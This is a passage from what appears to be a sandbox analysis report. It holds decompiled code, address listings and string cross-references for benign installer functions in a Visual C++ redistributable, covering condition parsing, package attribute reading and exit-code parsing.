															 *(_t209 + 0x30) = 1;
															_t229 = 0x8007000d;
															E000137D3(_t159, "condition.cpp", 0x2a1, 0x8007000d);
															_push(_v12);
															_t98 = _t209 + 4; // 0x70680f79
															_push( *_t98);
															_push("Failed to parse condition \"%ls\". Constant too big, at position %d.");
															goto L72;
														}
													}
												}
												goto L102;
											}
											_t238 = 0x8007000d;
											 *(_t209 + 0x30) = 1;
											_t229 = 0x8007000d;
											E000137D3(_t155, "condition.cpp", 0x294, 0x8007000d);
											_push(_v12);
											_t104 = _t209 + 4; // 0x70680f79
											_push( *_t104);
											_push("Failed to parse condition \"%ls\". Identifier cannot start at a digit, at position %d.");
											goto L72;
										} else {
											_a4 = 0x2d;
											if(_a4 == ( *_t213 & 0x0000ffff)) {
												goto L60;
											} else {
												_t166 = 0x5f;
												if((_t224 & 0x00000100) != 0) {
													L38:
													_t42 =  &(_t213[1]); // 0x560005dd
													GetStringTypeW(1, _t42, 1,  &_v8);
													_t43 = _t209 + 8; // 0x560005db
													_t217 = 0x76;
													if(_t217 !=  *((intOrPtr*)( *_t43)) || (_v8 & 0x00000004) == 0) {
														_t232 = 0x5f;
														goto L49;
														do {
															do {
																L49:
																_t237 = _t237 + 1;
																_t67 = _t209 + 8; // 0x560005db
																GetStringTypeW(1,  *_t67 + _t237 + _t237, 1,  &_v8);
															} while ((_v8 & 0x00000104) != 0);
															_t72 = _t209 + 8; // 0x560005db
															_t175 =  *_t72;
														} while (_t232 == _t175[_t237]);
														_t229 = 0;
														if(_t237 != 2) {
															if(_t237 != 3) {
																goto L59;
															} else {
																if(CompareStringW(0x7f, 1, _t175, _t237, L"AND", _t237) != 2) {
																	_t78 = _t209 + 8; // 0x560005db
																	if(CompareStringW(0x7f, 1,  *_t78, 3, L"NOT", 3) != 2) {
																		goto L59;
																	} else {
																		 *(_t209 + 0x10) = 4;
																		goto L101;
																	}
																} else {
																	 *(_t209 + 0x10) = _t237;
																	goto L101;
																}
															}
														} else {
															_t179 = CompareStringW(0x7f, 1, _t175, 2, L"OR", 2);
															_t219 = _v16;
															if(_t179 != _t219) {
																L59:
																_push(_t237);
																_t80 = _t209 + 8; // 0x560005db
																_push( *_t80);
																 *(_t209 + 0x10) = 0x11;
																L16:
																_t24 = _t209 + 0x18; // 0x19801
																_t161 = E000302F4();
																L17:
																_t214 = _t161;
																_a4 = _t214;
																if(_t214 >= 0) {
																	_t229 = _a4;
																	goto L101;
																} else {
																	_push("Failed to set symbol value.");
																	_push(_t214);
																	E0005012F();
																	_t229 = _a4;
																}
															} else {
																 *(_t209 + 0x10) = _t219;
																goto L101;
															}
														}
													} else {
														_t234 = 1;
														while(1) {
															L41:
															_t47 = _t209 + 8; // 0x560005db
															_a4 = _t237;
															_t237 = _t237 + 1;
															_t220 = 0x2e;
															_t181 =  *_t47 + _t237 * 2;
															if(_t220 !=  *_t181) {
																break;
															}
															_t234 = _t234 + 1;
															if(_t234 <= 4) {
																continue;
															} else {
																_t238 = 0x8007000d;
																 *(_t209 + 0x30) = 1;
																_t229 = 0x8007000d;
																E000137D3(_t181, "condition.cpp", 0x2b9, 0x8007000d);
																_push(_v12);
																_t53 = _t209 + 4; // 0x70680f79
																_push( *_t53);
																_push("Failed to parse condition \"%ls\". Version can have a maximum of 4 parts, at position %d.");
																goto L72;
															}
															goto L102;
														}
														GetStringTypeW(1, _t181, 1,  &_v8);
														if((_v8 & 0x00000004) != 0) {
															goto L41;
														} else {
															_t58 = _t209 + 0x18; // 0x19801
															_t59 = _t209 + 8; // 0x560005db
															_t229 = E00054B5A(_t224,  *_t59 + 2, _a4, _t58);
															if(_t229 >= 0) {
																 *(_t209 + 0x28) = 3;
																 *(_t209 + 0x10) = 0x13;
																goto L101;
															} else {
																_t238 = 0x8007000d;
																 *(_t209 + 0x30) = 1;
																_t229 = 0x8007000d;
																E000137D3(_t186, "condition.cpp", 0x2cc, 0x8007000d);
																_push(_v12);
																_t63 = _t209 + 4; // 0x70680f79
																_push( *_t63);
																_push("Failed to parse condition \"%ls\". Invalid version format, at position %d.");
																goto L72;
															}
														}
													}
												} else {
													_t224 =  *_t213 & 0x0000ffff;
													if(_t166 == ( *_t213 & 0x0000ffff)) {
														goto L38;
													} else {
														_t238 = 0x8007000d;
														 *(_t209 + 0x30) = 1;
														_t229 = 0x8007000d;
														E000137D3(_t166, "condition.cpp", 0x2f7, 0x8007000d);
														_push(_v12);
														_t40 = _t209 + 4; // 0x70680f79
														_push( *_t40);
														_push("Failed to parse condition \"%ls\". Unexpected character at position %d.");
														L72:
														_push(_t238);
														E0005012F();
													}
												}
											}
										}
									} else {
										 *_t223 = 0xf;
										L12:
										_t237 = 1;
										L101:
										 *(_t209 + 0x14) = _v12;
										 *(_t209 + 8) =  *(_t209 + 8) + _t237 + _t237;
									}
								}
							}
						}
					}
				}
				L102:
				return _t229;
			}














































                                                                          0x00018e4f
                                                                          0x00018e55
                                                                          0x00018e58
                                                                          0x00018e5b
                                                                          0x00018e5f
                                                                          0x00018e64
                                                                          0x00018e64
                                                                          0x00018e67
                                                                          0x00018e74
                                                                          0x00018e75
                                                                          0x00018e77
                                                                          0x00018e82
                                                                          0x00018e84
                                                                          0x00018e89
                                                                          0x00018e8d
                                                                          0x00018e97
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018e99
                                                                          0x00018e9f
                                                                          0x00018ea5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018ea5
                                                                          0x00018ea7
                                                                          0x00018ea7
                                                                          0x00018ea7
                                                                          0x00018eaa
                                                                          0x00018eaa
                                                                          0x00018eaf
                                                                          0x00018eb4
                                                                          0x00018eb7
                                                                          0x00018eba
                                                                          0x00018ebd
                                                                          0x00018fc5
                                                                          0x00018fc8
                                                                          0x00019389
                                                                          0x00000000
                                                                          0x00018fce
                                                                          0x00018fce
                                                                          0x00018fd1
                                                                          0x00019355
                                                                          0x00019358
                                                                          0x0001937f
                                                                          0x00000000
                                                                          0x0001935a
                                                                          0x0001935a
                                                                          0x0001935d
                                                                          0x00019377
                                                                          0x00000000
                                                                          0x0001935f
                                                                          0x00019362
                                                                          0x0001936f
                                                                          0x00000000
                                                                          0x00019364
                                                                          0x00019364
                                                                          0x00000000
                                                                          0x00019364
                                                                          0x00019362
                                                                          0x0001935d
                                                                          0x00018fd7
                                                                          0x00018fda
                                                                          0x00019298
                                                                          0x0001929b
                                                                          0x0001931d
                                                                          0x00019320
                                                                          0x00019344
                                                                          0x00000000
                                                                          0x00019322
                                                                          0x00019322
                                                                          0x00019325
                                                                          0x0001933c
                                                                          0x00000000
                                                                          0x00019327
                                                                          0x0001932a
                                                                          0x00019334
                                                                          0x00000000
                                                                          0x0001932c
                                                                          0x0001932c
                                                                          0x00000000
                                                                          0x0001932c
                                                                          0x0001932a
                                                                          0x00019325
                                                                          0x00000000
                                                                          0x0001929d
                                                                          0x0001929d
                                                                          0x000192a0
                                                                          0x00019311
                                                                          0x00000000
                                                                          0x000192a2
                                                                          0x000192a2
                                                                          0x000192a5
                                                                          0x000192df
                                                                          0x000192e2
                                                                          0x00019309
                                                                          0x00000000
                                                                          0x000192e4
                                                                          0x000192e4
                                                                          0x000192e7
                                                                          0x00019301
                                                                          0x00000000
                                                                          0x000192e9
                                                                          0x000192ec
                                                                          0x000192f9
                                                                          0x0001934a
                                                                          0x0001934a
                                                                          0x000192ee
                                                                          0x000192ee
                                                                          0x00000000
                                                                          0x000192ee
                                                                          0x000192ec
                                                                          0x000192e7
                                                                          0x00000000
                                                                          0x000192a7
                                                                          0x000192a7
                                                                          0x000192ac
                                                                          0x000192ba
                                                                          0x000192bc
                                                                          0x000192c4
                                                                          0x000192c5
                                                                          0x000192c5
                                                                          0x000192c8
                                                                          0x00000000
                                                                          0x000192c8
                                                                          0x000192a5
                                                                          0x000192a0
                                                                          0x00018fe0
                                                                          0x00000000
                                                                          0x00018fe0
                                                                          0x00018fda
                                                                          0x00018fd1
                                                                          0x00018ec3
                                                                          0x00018ec3
                                                                          0x00018f88
                                                                          0x00018f8b
                                                                          0x00018fba
                                                                          0x00000000
                                                                          0x00018f8d
                                                                          0x00018f8d
                                                                          0x00018f90
                                                                          0x00018faf
                                                                          0x00000000
                                                                          0x00018f92
                                                                          0x00018f95
                                                                          0x00018fa4
                                                                          0x00019385
                                                                          0x00019385
                                                                          0x0001934c
                                                                          0x0001934c
                                                                          0x00018f97
                                                                          0x00018f97
                                                                          0x00018f9d
                                                                          0x00018f9d
                                                                          0x00018f9d
                                                                          0x00018f95
                                                                          0x00018f90
                                                                          0x0001934d
                                                                          0x00000000
                                                                          0x00018ec9
                                                                          0x00018ec9
                                                                          0x00018ecb
                                                                          0x00018ecd
                                                                          0x00018f79
                                                                          0x00000000
                                                                          0x00018ed3
                                                                          0x00018ed3
                                                                          0x00018ed6
                                                                          0x00018efc
                                                                          0x00018efc
                                                                          0x00018eff
                                                                          0x00018f06
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018f0a
                                                                          0x00018f0e
                                                                          0x00000000
                                                                          0x00018f10
                                                                          0x00018f10
                                                                          0x00018f11
                                                                          0x00018f17
                                                                          0x00018f1b
                                                                          0x00000000
                                                                          0x00018f1e
                                                                          0x00000000
                                                                          0x00018f0e
                                                                          0x00018f4a
                                                                          0x00018f4f
                                                                          0x00018f61
                                                                          0x00018f63
                                                                          0x00018f6b
                                                                          0x00018f6c
                                                                          0x00018f6c
                                                                          0x00018f6f
                                                                          0x00000000
                                                                          0x00018ed8
                                                                          0x00018ed8
                                                                          0x00018edb
                                                                          0x00018eee
                                                                          0x00000000
                                                                          0x00018edd
                                                                          0x00018ee0
                                                                          0x00018fe2
                                                                          0x00018fe2
                                                                          0x00018fe8
                                                                          0x000191dc
                                                                          0x000191de
                                                                          0x000191df
                                                                          0x000191df
                                                                          0x000191ec
                                                                          0x000191f9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000191fb
                                                                          0x000191fb
                                                                          0x00019202
                                                                          0x00000000
                                                                          0x00019204
                                                                          0x00019208
                                                                          0x00000000
                                                                          0x0001920a
                                                                          0x0001920d
                                                                          0x00019216
                                                                          0x0001921a
                                                                          0x00019226
                                                                          0x00019257
                                                                          0x0001925e
                                                                          0x00000000
                                                                          0x00019228
                                                                          0x00019228
                                                                          0x0001922d
                                                                          0x0001923f
                                                                          0x00019241
                                                                          0x00019249
                                                                          0x0001924a
                                                                          0x0001924a
                                                                          0x0001924d
                                                                          0x00000000
                                                                          0x0001924d
                                                                          0x00019226
                                                                          0x00019208
                                                                          0x00000000
                                                                          0x00019202
                                                                          0x00019268
                                                                          0x0001926d
                                                                          0x0001927f
                                                                          0x00019281
                                                                          0x00019289
                                                                          0x0001928a
                                                                          0x0001928a
                                                                          0x0001928d
                                                                          0x00000000
                                                                          0x00018fee
                                                                          0x00018ff1
                                                                          0x00018ffc
                                                                          0x00000000
                                                                          0x00019002
                                                                          0x00019004
                                                                          0x0001900b
                                                                          0x00019044
                                                                          0x0001904a
                                                                          0x00019050
                                                                          0x00019056
                                                                          0x0001905b
                                                                          0x0001905f
                                                                          0x0001912b
                                                                          0x0001912b
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x00019131
                                                                          0x0001913e
                                                                          0x00019144
                                                                          0x0001914d
                                                                          0x0001914d
                                                                          0x00019150
                                                                          0x00019158
                                                                          0x0001915c
                                                                          0x00019184
                                                                          0x00000000
                                                                          0x00019186
                                                                          0x0001919b
                                                                          0x000191ae
                                                                          0x000191be
                                                                          0x00000000
                                                                          0x000191c0
                                                                          0x000191c0
                                                                          0x00000000
                                                                          0x000191c0
                                                                          0x0001919d
                                                                          0x0001919d
                                                                          0x00000000
                                                                          0x0001919d
                                                                          0x0001919b
                                                                          0x0001915e
                                                                          0x0001916c
                                                                          0x00019172
                                                                          0x00019177
                                                                          0x000191cc
                                                                          0x000191cc
                                                                          0x000191cd
                                                                          0x000191cd
                                                                          0x000191d0
                                                                          0x00018f1f
                                                                          0x00018f1f
                                                                          0x00018f23
                                                                          0x00018f28
                                                                          0x00018f28
                                                                          0x00018f2a
                                                                          0x00018f2f
                                                                          0x00019394
                                                                          0x00000000
                                                                          0x00018f35
                                                                          0x00018f35
                                                                          0x00018f3a
                                                                          0x00018f3b
                                                                          0x00018f40
                                                                          0x00018f44
                                                                          0x00019179
                                                                          0x00019179
                                                                          0x00000000
                                                                          0x00019179
                                                                          0x00019177
                                                                          0x0001906f
                                                                          0x00019071
                                                                          0x00019072
                                                                          0x00019072
                                                                          0x00019072
                                                                          0x00019075
                                                                          0x00019078
                                                                          0x0001907b
                                                                          0x0001907c
                                                                          0x00019082
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00019084
                                                                          0x00019088
                                                                          0x00000000
                                                                          0x0001908a
                                                                          0x0001908a
                                                                          0x0001908f
                                                                          0x000190a1
                                                                          0x000190a3
                                                                          0x000190ab
                                                                          0x000190ac
                                                                          0x000190ac
                                                                          0x000190af
                                                                          0x00000000
                                                                          0x000190af
                                                                          0x00000000
                                                                          0x00019088
                                                                          0x000190c2
                                                                          0x000190cc
                                                                          0x00000000
                                                                          0x000190ce
                                                                          0x000190ce
                                                                          0x000190d2
                                                                          0x000190e1
                                                                          0x000190e5
                                                                          0x00019116
                                                                          0x0001911d
                                                                          0x00000000
                                                                          0x000190e7
                                                                          0x000190e7
                                                                          0x000190ec
                                                                          0x000190fe
                                                                          0x00019100
                                                                          0x00019108
                                                                          0x00019109
                                                                          0x00019109
                                                                          0x0001910c
                                                                          0x00000000
                                                                          0x0001910c
                                                                          0x000190e5
                                                                          0x000190cc
                                                                          0x0001900d
                                                                          0x0001900d
                                                                          0x00019013
                                                                          0x00000000
                                                                          0x00019015
                                                                          0x00019015
                                                                          0x0001901a
                                                                          0x0001902c
                                                                          0x0001902e
                                                                          0x00019036
                                                                          0x00019037
                                                                          0x00019037
                                                                          0x0001903a
                                                                          0x000192cd
                                                                          0x000192cd
                                                                          0x000192ce
                                                                          0x000192d3
                                                                          0x00019013
                                                                          0x0001900b
                                                                          0x00018ffc
                                                                          0x00018ee6
                                                                          0x00018ee6
                                                                          0x00018ef4
                                                                          0x00018ef6
                                                                          0x00019397
                                                                          0x0001939a
                                                                          0x000193a0
                                                                          0x000193a0
                                                                          0x00018ee0
                                                                          0x00018edb
                                                                          0x00018ed6
                                                                          0x00018ecd
                                                                          0x00018ec3
                                                                          0x000193a3
                                                                          0x000193ab

                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,560005DB,00000001,?,00019801,?,00000000,00000000), ref: 00018E8D
                                                                          Strings
                                                                          • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 0001924D
                                                                          • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 0001903A
                                                                          • -, xrefs: 00018FF1
                                                                          • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 0001910C
                                                                          • AND, xrefs: 00019187
                                                                          • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 000190AF
                                                                          • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00018F6F
                                                                          • @, xrefs: 00018E93
                                                                          • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 000192C8
                                                                          • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 0001928D
                                                                          • Failed to set symbol value., xrefs: 00018F35
                                                                          • NOT, xrefs: 000191A7
                                                                          • condition.cpp, xrefs: 00018F5C, 00019027, 0001909C, 000190F9, 0001923A, 0001927A, 000192B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringType
                                                                          • String ID: -$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                          • API String ID: 4177115715-3640792234
                                                                          • Opcode ID: b5aaf9deb16803b9438f56268ba8742b72e9d923afda8bb7ec614330ea6d47d7
                                                                          • Instruction ID: ffb4c7566fea918e185031cd92ca41c7d71cc0f9e94b7b62d67928dcb558467c
                                                                          • Opcode Fuzzy Hash: b5aaf9deb16803b9438f56268ba8742b72e9d923afda8bb7ec614330ea6d47d7
                                                                          • Instruction Fuzzy Hash: C5E1F071644205EBEB258F54C8A9BFE7BA9FB05710F148096FA059F2C6C7B5CAC1CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000325AF Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E000325AF(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* __ebx;
				int _t39;
				signed int _t48;
				intOrPtr _t50;
				void* _t57;
				void* _t58;
				void* _t59;

				_t45 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t43 = _a4;
				_t50 = _a8;
				if(E000531C7(_a4, L"DetectCondition", _t50 + 0x90) >= 0) {
					if(E000531C7(_t43, L"InstallArguments", _t50 + 0x94) >= 0) {
						if(E000531C7(_t43, L"UninstallArguments", _t50 + 0x9c) >= 0) {
							if(E000531C7(_t43, L"RepairArguments", _t50 + 0x98) >= 0) {
								_t57 = E000533DB(_t45, _t43, L"Repairable", _t50 + 0xac);
								if(_t57 == 0x80070490 || _t57 >= 0) {
									_t58 = E000531C7(_t43, L"Protocol",  &_v8);
									if(_t58 < 0) {
										if(_t58 == 0x80070490) {
											goto L14;
										} else {
											_push("Failed to get @Protocol.");
											goto L25;
										}
									} else {
										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"burn", 0xffffffff) != 2) {
											_t39 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"netfx4", 0xffffffff);
											_t48 = 2;
											if(_t39 != _t48) {
												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"none", 0xffffffff) != 2) {
													_t59 = 0x8000ffff;
													E0005012F(0x8000ffff, "Invalid protocol type: %ls", _v8);
												} else {
													 *(_t50 + 0xb0) =  *(_t50 + 0xb0) & 0x00000000;
													goto L14;
												}
											} else {
												 *(_t50 + 0xb0) = _t48;
												goto L14;
											}
										} else {
											 *(_t50 + 0xb0) = 1;
											L14:
											_t59 = E00031970(_t43, _t43, _t50);
											if(_t59 >= 0) {
												_t59 = E000317C4(_t43, _t50);
												if(_t59 < 0) {
													_push("Failed to parse command lines.");
													goto L25;
												}
											} else {
												_push("Failed to parse exit codes.");
												goto L25;
											}
										}
									}
								} else {
									_push("Failed to get @Repairable.");
									goto L25;
								}
							} else {
								_push("Failed to get @RepairArguments.");
								goto L25;
							}
						} else {
							_push("Failed to get @UninstallArguments.");
							goto L25;
						}
					} else {
						_push("Failed to get @InstallArguments.");
						goto L25;
					}
				} else {
					_push("Failed to get @DetectCondition.");
					L25:
					_push(_t59);
					E0005012F();
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t59;
			}











                                                                          0x000325af
                                                                          0x000325b2
                                                                          0x000325b3
                                                                          0x000325b8
                                                                          0x000325bd
                                                                          0x000325d6
                                                                          0x000325f8
                                                                          0x0003261a
                                                                          0x0003263c
                                                                          0x0003265a
                                                                          0x00032662
                                                                          0x00032681
                                                                          0x00032685
                                                                          0x00032725
                                                                          0x00000000
                                                                          0x00032727
                                                                          0x00032727
                                                                          0x00000000
                                                                          0x00032727
                                                                          0x0003268b
                                                                          0x000326a6
                                                                          0x000326d6
                                                                          0x000326da
                                                                          0x000326dd
                                                                          0x000326fc
                                                                          0x0003270a
                                                                          0x00032715
                                                                          0x000326fe
                                                                          0x000326fe
                                                                          0x00000000
                                                                          0x000326fe
                                                                          0x000326df
                                                                          0x000326df
                                                                          0x00000000
                                                                          0x000326df
                                                                          0x000326a8
                                                                          0x000326a8
                                                                          0x000326b2
                                                                          0x000326b9
                                                                          0x000326bd
                                                                          0x00032735
                                                                          0x00032739
                                                                          0x0003273b
                                                                          0x00000000
                                                                          0x0003273b
                                                                          0x000326bf
                                                                          0x000326bf
                                                                          0x00000000
                                                                          0x000326bf
                                                                          0x000326bd
                                                                          0x000326a6
                                                                          0x00032668
                                                                          0x00032668
                                                                          0x00000000
                                                                          0x00032668
                                                                          0x0003263e
                                                                          0x0003263e
                                                                          0x00000000
                                                                          0x0003263e
                                                                          0x0003261c
                                                                          0x0003261c
                                                                          0x00000000
                                                                          0x0003261c
                                                                          0x000325fa
                                                                          0x000325fa
                                                                          0x00000000
                                                                          0x000325fa
                                                                          0x000325d8
                                                                          0x000325d8
                                                                          0x00032740
                                                                          0x00032740
                                                                          0x00032741
                                                                          0x00032747
                                                                          0x0003274c
                                                                          0x00032751
                                                                          0x00032751
                                                                          0x0003275e

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                          • API String ID: 760788290-1911311241
                                                                          • Opcode ID: 1effc5b638ba07bb46da06c425c2f8f695c30c4f058f112df245bd337985e46b
                                                                          • Instruction ID: c1eeb7f3297fde685540a0d0bb834405564043aa90af5f67e6a9ec44fa0783e0
                                                                          • Opcode Fuzzy Hash: 1effc5b638ba07bb46da06c425c2f8f695c30c4f058f112df245bd337985e46b
                                                                          • Instruction Fuzzy Hash: F8410832B88726B6C72771648C43FAFB55DAF12B71F200311FE11BA2D1C765AD0486D6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00031970 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00031970(void* __ebx, int _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int _v24;
				intOrPtr* _t50;
				intOrPtr _t60;
				int _t61;
				int _t68;
				void* _t74;
				intOrPtr _t78;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr* _t94;
				int _t98;
				int _t100;
				intOrPtr* _t102;
				intOrPtr _t103;

				_t100 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t103 = E00053803(_a4, L"ExitCode",  &_v20);
				if(_t103 >= 0) {
					_t50 = _v20;
					_t103 =  *((intOrPtr*)( *_t50 + 0x20))(_t50,  &_v16);
					if(_t103 >= 0) {
						_t52 = _v16;
						if(_v16 == 0) {
							L35:
							_t103 = _t100;
						} else {
							_t60 = E000138D4(_t52 * 0xc, 1);
							_t89 = _a8;
							 *((intOrPtr*)(_t89 + 0xb4)) = _t60;
							if(_t60 != 0) {
								_t61 = _v16;
								 *((intOrPtr*)(_t89 + 0xb8)) = _t61;
								_a4 = 0;
								if(_t61 == 0) {
									goto L35;
								} else {
									_t98 = 0;
									_v24 = 0;
									while(1) {
										_t102 =  *((intOrPtr*)(_t89 + 0xb4)) + _t98;
										_t103 = E00053760(_t89, _v20,  &_v12, 0);
										if(_t103 < 0) {
											break;
										}
										_t103 = E000531C7(_v12, L"Type",  &_v8);
										if(_t103 < 0) {
											_push("Failed to get @Type.");
											goto L34;
										} else {
											if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"success", 0xffffffff) != 2) {
												_t68 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"error", 0xffffffff);
												_t92 = 2;
												if(_t68 != _t92) {
													if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheduleReboot", 0xffffffff) != 2) {
														if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"forceReboot", 0xffffffff) != 2) {
															_push(_v8);
															_t103 = 0x8000ffff;
															_push("Invalid exit code type: %ls");
															goto L31;
														} else {
															 *_t102 = 4;
															goto L20;
														}
													} else {
														 *_t102 = 3;
														goto L20;
													}
												} else {
													 *_t102 = _t92;
													goto L20;
												}
											} else {
												 *_t102 = 1;
												L20:
												_t103 = E000531C7(_v12, L"Code",  &_v8);
												if(_t103 < 0) {
													_push("Failed to get @Code.");
													goto L34;
												} else {
													_t93 = _v8;
													_t74 = 0x2a;
													if(_t74 !=  *_v8) {
														_t100 = 0;
														_t103 = E000129DC(_t93, _t98, _t93, 0, _t102 + 4);
														if(_t103 < 0) {
															_push(_v8);
															_push("Failed to parse @Code value: %ls");
															L31:
															_push(_t103);
															E0005012F();
														} else {
															goto L24;
														}
													} else {
														 *((intOrPtr*)(_t102 + 8)) = 1;
														_t100 = 0;
														L24:
														_t94 = _v12;
														if(_t94 != 0) {
															 *((intOrPtr*)( *_t94 + 8))(_t94);
															_v12 = _t100;
														}
														_t78 = _a4 + 1;
														_t98 = _v24 + 0xc;
														_a4 = _t78;
														_v24 = _t98;
														if(_t78 >= _v16) {
															goto L35;
														} else {
															_t89 = _a8;
															continue;
														}
													}
												}
											}
										}
										goto L36;
									}
									_push("Failed to get next node.");
									goto L34;
								}
							} else {
								_t103 = 0x8007000e;
								E000137D3(_t60, "exeengine.cpp", 0x272, 0x8007000e);
								_push("Failed to allocate memory for exit code structs.");
								L34:
								_push(_t103);
								E0005012F();
							}
						}
						L36:
					} else {
						_push("Failed to get exit code node count.");
						goto L2;
					}
				} else {
					_push("Failed to select exit code nodes.");
					L2:
					_push(_t103);
					E0005012F();
				}
				_t87 = _v20;
				if(_t87 != 0) {
					 *((intOrPtr*)( *_t87 + 8))(_t87);
				}
				_t88 = _v12;
				if(_t88 != 0) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t103;
			}























                                                                          0x0003197b
                                                                          0x00031986
                                                                          0x00031989
                                                                          0x0003198c
                                                                          0x0003198f
                                                                          0x00031997
                                                                          0x0003199b
                                                                          0x000319af
                                                                          0x000319bc
                                                                          0x000319c0
                                                                          0x000319c9
                                                                          0x000319cf
                                                                          0x00031b8c
                                                                          0x00031b8c
                                                                          0x000319d5
                                                                          0x000319db
                                                                          0x000319e0
                                                                          0x000319e3
                                                                          0x000319eb
                                                                          0x00031a0c
                                                                          0x00031a0f
                                                                          0x00031a15
                                                                          0x00031a1a
                                                                          0x00000000
                                                                          0x00031a20
                                                                          0x00031a26
                                                                          0x00031a28
                                                                          0x00031a2b
                                                                          0x00031a3a
                                                                          0x00031a41
                                                                          0x00031a45
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00031a5c
                                                                          0x00031a60
                                                                          0x00031b76
                                                                          0x00000000
                                                                          0x00031a66
                                                                          0x00031a7c
                                                                          0x00031a95
                                                                          0x00031a99
                                                                          0x00031a9c
                                                                          0x00031ab6
                                                                          0x00031ad4
                                                                          0x00031b5e
                                                                          0x00031b61
                                                                          0x00031b66
                                                                          0x00000000
                                                                          0x00031ada
                                                                          0x00031ada
                                                                          0x00000000
                                                                          0x00031ada
                                                                          0x00031ab8
                                                                          0x00031ab8
                                                                          0x00000000
                                                                          0x00031ab8
                                                                          0x00031a9e
                                                                          0x00031a9e
                                                                          0x00000000
                                                                          0x00031a9e
                                                                          0x00031a7e
                                                                          0x00031a7e
                                                                          0x00031ae0
                                                                          0x00031af1
                                                                          0x00031af5
                                                                          0x00031b57
                                                                          0x00000000
                                                                          0x00031af7
                                                                          0x00031af7
                                                                          0x00031afc
                                                                          0x00031b00
                                                                          0x00031b10
                                                                          0x00031b1a
                                                                          0x00031b1e
                                                                          0x00031b4d
                                                                          0x00031b50
                                                                          0x00031b6b
                                                                          0x00031b6b
                                                                          0x00031b6c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00031b02
                                                                          0x00031b02
                                                                          0x00031b09
                                                                          0x00031b20
                                                                          0x00031b20
                                                                          0x00031b25
                                                                          0x00031b2a
                                                                          0x00031b2d
